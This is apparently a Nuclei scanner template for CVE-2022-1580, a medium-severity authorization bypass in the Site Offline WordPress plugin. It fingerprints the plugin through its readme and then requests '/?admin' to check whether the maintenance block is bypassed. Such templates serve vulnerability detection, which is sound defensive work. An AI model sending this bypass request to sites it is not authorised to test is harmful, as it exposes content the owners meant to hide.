id: CVE-2022-1580 info: name: Site Offline WP Plugin < 1.5.3 - Authorization Bypass author: Kazgangap severity: medium description: | The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature. remediation: Fixed in 1.5.3 reference: - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1580 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2022-1580 cwe-id: CWE-639 epss-score: 0.00069 epss-percentile: 0.29862 cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: freehtmldesigns product: site_offline framework: wordpress publicwww-query: "/wp-content/plugins/site-offline/" tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/site-offline/readme.txt" matchers: - type: word internal: true words: - 'Site Offline Or Coming Soon Or Maintenance Mode' - method: GET path: - "{{BaseURL}}/?admin" matchers: - type: dsl dsl: - 'contains_all(body, "wp-block", "author")' - 'status_code == 200' condition: and # digest: 4b0a004830460221009c5c774a95cb5497871b3f6ef6e59a638ccd5c1b632808c2fb76052e3bf686fc022100aecb083a1abe1b2192f29c4d840da919836f3dc858153f0b7936a6c642240fec:922c64590222798bb761d5b6d8e72950